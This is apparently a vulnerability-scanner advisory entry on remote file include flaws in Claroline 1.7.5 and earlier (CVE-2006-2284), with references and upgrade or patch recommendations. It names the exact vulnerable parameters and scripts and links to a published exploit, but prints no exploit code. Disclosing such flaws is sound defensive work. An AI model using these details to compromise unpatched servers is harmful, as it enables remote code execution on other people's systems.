| VID |
21894 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The Claroline software is vulnerable to multiple remote file include vulnerabilities which exist in versions 1.7.5 and earlier. Claroline is an Open Source software based on PHP/MySQL. It's a collaborative learning environment allowing teachers or education institutions to create and administer courses through the Web. Claroline version 1.7.5 and earlier versions are vulnerable to multiple remote file include vulnerabilities, caused by improper validation of user-supplied input passed to the 'clarolineRepositorySys' parameter of the 'claroline/auth/extauth/drivers/ldap.inc.php' script and the 'claro_CasLibPath' parameter of the 'claroline/auth/extauth/casProcess.inc.php' script. If the register_globals is enabled, a remote attacker could send a specially-crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
* References:
http://www.claroline.net/forum/viewtopic.php?t=5578
http://www.securityfocus.com/archive/1/433249/30/0/threaded
http://lists.grok.org.uk/pipermail/full-disclosure/2006-May/045895.html
http://milw0rm.com/exploits/1766
http://secunia.com/advisories/20003/
* Platforms Affected:
Claroline GPL Open Source Project, Claroline version 1.7.5 and earlier versions
Any operating system Any version |
| Recommendation |
Upgrade to the latest version of Claroline (1.7.6 or later), available from the Claroline Download Web site at http://www.claroline.net/download.htm
-- OR --
Apply the patch appropriate for the installed version of Claroline, available from the following web sites:
Claroline 1.7.5 : http://www.claroline.net/dlarea/claroline.patch17501.zip
Claroline 1.6.4 : http://www.claroline.net/dlarea/claroline.patch16401.zip |
| Related URL |
CVE-2006-2284 (CVE) |
| Related URL |
17873 (SecurityFocus) |
| Related URL |
26280 (ISS) |
|
